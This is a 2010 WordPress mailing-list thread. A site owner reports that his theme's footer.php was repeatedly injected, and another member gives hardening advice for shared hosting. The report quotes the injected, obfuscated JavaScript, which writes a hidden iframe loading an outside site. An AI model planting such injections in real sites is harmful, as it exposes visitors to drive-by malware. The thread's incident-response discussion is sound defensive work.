[wp-hackers] wordpress theme script injection (hosted on dreamhost)
banago at gmail.com
Sun Oct 31 18:18:13 UTC 2010
> * On shared hosting WP is often the target, but rarely the entrance.*
This seems so true.
www.wplancer.com | www.banago.info | www.lintuts.com
On 31 October 2010 22:45, Ozh <ozh at ozh.org> wrote:
> Typically not a Dreamhost issue, otherwise there would be *thousands*
> of people screaming, and me in first line
> Being up to date with WP is fine, but most hack on shared hosting are
> not done using WP
> - check file permissions <http://codex.wordpress.org/Hardening_WordPress>
> - check other softwares & scripts running on your blog
> - change your main/SSH/FTP password
> - change your WP password
> I once had a WP blog hacked on Dreamhost. A few hours of investigation
> later (checking all the above + inspecting access logs) I found out
> that the insecure stuff was Scuttle (a delicious clone).
> On shared hosting WP is often the target, but rarely the entrance.
> On Sun, Oct 31, 2010 at 4:07 PM, Mladen Adamovic
> <mladen.adamovic at gmail.com> wrote:
> > Hi guys,
> > My wordpress software instance was repeatedly hacked ... running latest
> > Wordpress source code and being hosted on Dreamhost.
> > I don't know which exploit it did use and couldn't identify it, but it
> > adding the following code to my default theme footer.php:
> > <script>
> > enc =
> > withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> > dec = unescape(enc);
> > document.write(dec);
> > </script>
> > I think I'll have to migrate to Blogger, since I couldn't identify
> > it did use.
> > I wanted to drop you an email anyhow since identifying exploits is
> > important!
> > _______________________________________________
> > wp-hackers mailing list
> > wp-hackers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
More information about the wp-hackers